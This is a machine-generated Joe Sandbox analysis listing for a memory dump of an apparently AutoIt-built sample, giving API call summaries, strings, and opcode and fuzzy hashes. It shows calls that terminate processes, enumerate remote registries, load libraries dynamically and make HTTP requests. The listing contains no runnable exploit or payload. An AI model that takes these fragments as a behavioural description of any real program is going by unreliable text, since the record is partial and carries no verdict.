                                          • Part of subcall function 00798AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(0082AC68,00000FA0,?,?,007987E1,00796AFA,008267D8,00000014), ref: 00798AD1
                                        • __mtterm.LIBCMT ref: 007987E5
                                          • Part of subcall function 0079884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 007989CF
                                          • Part of subcall function 0079884D: _free.LIBCMT ref: 007989D6
                                          • Part of subcall function 0079884D: RtlDeleteCriticalSection.NTDLL(0082AC68), ref: 007989F8
                                        • __calloc_crt.LIBCMT ref: 0079880A
                                        • GetCurrentThreadId.KERNEL32 ref: 00798833
                                        Similarity
                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 2942034483-0
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 1423608774-0
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00771898
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007718A0
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007718AB
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007718B6
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007718BE
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007718C6
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B8504
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B851A
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 007B8529
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B8538
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B8542
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B8549
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,?), ref: 007BA330
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007BA341
                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,007E66D3,?,?,?,?,?,0077E681), ref: 007BA34E
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007E66D3,?,?,?,?,?,0077E681), ref: 007BA35B
                                          • Part of subcall function 007B9CCE: CloseHandle.KERNEL32(?,?,007BA368,?,?,?,007E66D3,?,?,?,?,?,0077E681), ref: 007B9CD8
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007BA36E
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007BA375
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        APIs
                                        • _memmove.LIBCMT ref: 0077C419
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,007B6653,?,?,00000000), ref: 0077C495
                                        Similarity
                                        • API ID: FileRead_memmove
                                        • String ID: Sf{
                                        • API String ID: 1325644223-1707814254
                                        APIs
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 0077BBD9: _memmove.LIBCMT ref: 0077BC33
                                        • __swprintf.LIBCMT ref: 0078D98F
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0078D832
                                        Similarity
                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 1943609520-557222456
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007CB4A8
                                        • CharUpperBuffW.USER32(?,?), ref: 007CB5B7
                                        • VariantClear.OLEAUT32(?), ref: 007CB73A
                                          • Part of subcall function 007BA6F6: VariantInit.OLEAUT32(00000000), ref: 007BA736
                                          • Part of subcall function 007BA6F6: VariantCopy.OLEAUT32(?,?), ref: 007BA73F
                                          • Part of subcall function 007BA6F6: VariantClear.OLEAUT32(?), ref: 007BA74B
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4237274167-1221869570
                                        APIs
                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007B10B8
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007B10EE
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007B10FF
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007B1181
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: f134ae5af02833d6dea25149492d9d7e67db685e8d1553ccb266e5329c20174a
                                        • Instruction ID: b00d938ae6b41e708bfea246392be8ff931d96dc3198130f7d48a2f9ca34a098
                                        • Opcode Fuzzy Hash: f134ae5af02833d6dea25149492d9d7e67db685e8d1553ccb266e5329c20174a
                                        • Instruction Fuzzy Hash: E8413CB160020CEFDB15CF58CC94BEA7BAAEF45350B9480A9AA05DF205D7B9DD44CBA0
                                        APIs
                                        • _memset.LIBCMT ref: 007B5A93
                                        • GetMenuItemInfoW.USER32 ref: 007B5AAF
                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007B5AF5
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008318F0,00000000), ref: 007B5B3E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem_memset
                                        • String ID: 0
                                        • API String ID: 1173514356-4108050209
                                        • Opcode ID: abb495e5016848cbf9fd6e977ce68813ae6a0af275baefa80e7a5446019d20f0
                                        • Instruction ID: a48c0d7add039fd08b400eee1a2c4fc041970ecb2c9a43084910d4a22a763386
                                        • Opcode Fuzzy Hash: abb495e5016848cbf9fd6e977ce68813ae6a0af275baefa80e7a5446019d20f0
                                        • Instruction Fuzzy Hash: F8418171204741EFDB20DF24C884FABBBE4AF89714F14461DF9A59B2D1D778A800CB66
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 007D0478
                                          • Part of subcall function 00777F40: _memmove.LIBCMT ref: 00777F8F
                                          • Part of subcall function 0077A2FB: _memmove.LIBCMT ref: 0077A33D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 2411302734-567219261
                                        • Opcode ID: 6d3bd66968b9db56d0cf14cb82d499bfc912c05fdae350976fec511b71ce5a97
                                        • Instruction ID: 5225417328b98390587d7f3251735ee35c276f0c4526bd7338b61a16fbe93e71
                                        • Opcode Fuzzy Hash: 6d3bd66968b9db56d0cf14cb82d499bfc912c05fdae350976fec511b71ce5a97
                                        • Instruction Fuzzy Hash: 0631903450061AEBCF04EF58D841EEEB3B5FF15350F10862AE866A72D1DB79E915CB90
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007AC684
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007AC697
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 007AC6C7
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 458670788-1403004172
                                        • Opcode ID: 08c60c3bcf5e2de29276c52fc17e0064c5944ac9b9dc8a4d2681e78321cf4e13
                                        • Instruction ID: 33e6692a4b6cdff5990e6a81b8b2ee74e9a3ae5a933787313e3cf2c8dfd1d03c
                                        • Opcode Fuzzy Hash: 08c60c3bcf5e2de29276c52fc17e0064c5944ac9b9dc8a4d2681e78321cf4e13
                                        • Instruction Fuzzy Hash: 3521E472900108FEDB15EBA4DC8ADFE7779DF86350B108219F426E71E0DB7C4D069650
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C4A60
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C4A86
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C4AB6
                                        • InternetCloseHandle.WININET(00000000), ref: 007C4AFD
                                          • Part of subcall function 007C56A9: GetLastError.KERNEL32(?,?,007C4A2B,00000000,00000000,00000001), ref: 007C56BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 1951874230-3916222277
                                        • Opcode ID: 89beeb03866771f2095c83a69dbb2314e3531debc809500c0104a7ea32e57eb1
                                        • Instruction ID: 0660dc704385b07a5abaf04be49c901d226ebe76a69aec2790ed5449f43ae476
                                        • Opcode Fuzzy Hash: 89beeb03866771f2095c83a69dbb2314e3531debc809500c0104a7ea32e57eb1
                                        • Instruction Fuzzy Hash: EF21ACB5540208BEEB21EF649C98FBFB7EDEB88744F10801EF105A6140EA689D059778
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007E454E
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • _memset.LIBCMT ref: 00773965
                                        • _wcscpy.LIBCMT ref: 007739B5
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007739C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                        • String ID: Line:
                                        • API String ID: 3942752672-1585850449
                                        • Opcode ID: 3b0d1b44daf6769be34c508ed350db4374e49112487e2c9628c3d8531648672b
                                        • Instruction ID: 5c61c9f980ceee7f7d3db3f7d66949db00236bd0515eb6c6ec8bbb46a02e373d
                                        • Opcode Fuzzy Hash: 3b0d1b44daf6769be34c508ed350db4374e49112487e2c9628c3d8531648672b
                                        • Instruction Fuzzy Hash: 3831B771108340EBDF25EB50DC49FDF77E8BB54794F00891AF289821A1DB78AA58CB96
                                        APIs
                                          • Part of subcall function 0078C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                          • Part of subcall function 0078C619: GetStockObject.GDI32(00000011), ref: 0078C66B
                                          • Part of subcall function 0078C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D8F69
                                        • LoadLibraryW.KERNEL32(?), ref: 007D8F70
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D8F85
                                        • DestroyWindow.USER32(?), ref: 007D8F8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                        • String ID: SysAnimate32
                                        • API String ID: 4146253029-1011021900
                                        • Opcode ID: e071b4278353ab9964ce15e301f1483a1d2502eeb6000c1736d95c5a2f2cadb0
                                        • Instruction ID: 61912e68ce7210b354b8a7199111efd875a83cbaf3cbcdb1138a6c2043b3f00b
                                        • Opcode Fuzzy Hash: e071b4278353ab9964ce15e301f1483a1d2502eeb6000c1736d95c5a2f2cadb0
                                        • Instruction Fuzzy Hash: EC21BB71200205EFEF106F64DC44EBF37BAEB48364F10462AFA1497290CB39DC509762
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BE392
                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 007BE3E6
                                        • __swprintf.LIBCMT ref: 007BE3FF
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0080DBF0), ref: 007BE43D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu
                                        • API String ID: 3164766367-685833217
                                        • Opcode ID: fbcc520dcbe05040979382555219c54fda19e82ad514c2888758072712cbf96b
                                        • Instruction ID: a80799c0a1e1e507521528f6047b4d7d3e093eb39314a69c8a39c9c1f27dc2b4
                                        • Opcode Fuzzy Hash: fbcc520dcbe05040979382555219c54fda19e82ad514c2888758072712cbf96b
                                        • Instruction Fuzzy Hash: 94216035A40208EFCB10EB64CC89EEE77B9EF99710B108069F509D7251D679DE01CB61
                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                          • Part of subcall function 007AD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AD640
                                          • Part of subcall function 007AD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AD653
                                          • Part of subcall function 007AD623: GetCurrentThreadId.KERNEL32 ref: 007AD65A
                                          • Part of subcall function 007AD623: AttachThreadInput.USER32(00000000), ref: 007AD661
                                        • GetFocus.USER32 ref: 007AD7FB
                                          • Part of subcall function 007AD66C: GetParent.USER32(?), ref: 007AD67A
                                        • GetClassNameW.USER32(?,?,00000100), ref: 007AD844
                                        • EnumChildWindows.USER32(?,007AD8BA), ref: 007AD86C
                                        • __swprintf.LIBCMT ref: 007AD886
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                        • String ID: %s%d
                                        • API String ID: 1941087503-1110647743
                                        • Opcode ID: ca523befe6a8ef787e8604b33f9d4035d95172f5be51c6d3115a707468437d72
                                        • Instruction ID: 19b20c8fdd747e9541964d6fb6a1aa6433e04eeab7b7a6a70326fd0971662335
                                        • Opcode Fuzzy Hash: ca523befe6a8ef787e8604b33f9d4035d95172f5be51c6d3115a707468437d72
                                        • Instruction Fuzzy Hash: 2E11B471600205ABDF217F909C89FEE3779AB85744F0080B5BD0EAA186DBBC5D45CB71
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007D18E4
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007D1917
                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007D1A3A
                                        • CloseHandle.KERNEL32(?), ref: 007D1AB0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                        • String ID:
                                        • API String ID: 2364364464-0
                                        • Opcode ID: be4232e86389d33077905b460ad164558c5b4fd6a33fab3dcdc7caba959189ab
                                        • Instruction ID: bfd8b64a30cb8ca76d6a70710c3cc4c0be94dd84650e1bbe42d196b4574d297c
                                        • Opcode Fuzzy Hash: be4232e86389d33077905b460ad164558c5b4fd6a33fab3dcdc7caba959189ab
                                        • Instruction Fuzzy Hash: 9B814170A40215EFDF10EF64C88ABAD7BF5AF44720F54C059F909AF382D7B9A9418B91
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007D05DF
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007D066E
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 007D068C
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007D06D2
                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 007D06EC
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007BAEA5,?,?,00000000,00000008), ref: 0078F282
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007BAEA5,?,?,00000000,00000008), ref: 0078F2A6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                        • String ID:
                                        • API String ID: 327935632-0
                                        • Opcode ID: b0598923f3e579f19a17570865a2b71358bf6d48076c30bdbcf9ae062b41dc7d
                                        • Instruction ID: 92338c70615936483172cff1b5996e20127b201f61e254838c9fff18a2c46f4c
                                        • Opcode Fuzzy Hash: b0598923f3e579f19a17570865a2b71358bf6d48076c30bdbcf9ae062b41dc7d
                                        • Instruction Fuzzy Hash: CF514A75A00205EFCF10EFA8C499AADB7B5BF49310F14C05AE919AB351DB38ED15CB91
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2DE0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D2E1F
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D2E66
                                        • RegCloseKey.ADVAPI32(?,?), ref: 007D2E92
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D2E9F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3440857362-0
                                        • Opcode ID: 7b2d39150221c3f86088976ea9ffc062183f6c591d647ee7866a25632fd60d47
                                        • Instruction ID: 7582b22e589b8caaf9e520de6422f785a66f64c4ab26792ec765ac69be018e4a
                                        • Opcode Fuzzy Hash: 7b2d39150221c3f86088976ea9ffc062183f6c591d647ee7866a25632fd60d47
                                        • Instruction Fuzzy Hash: EB517C31204205EFC715EF64C889E6AB7F9BF98304F00881EF595872A1EB78ED06CB52
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
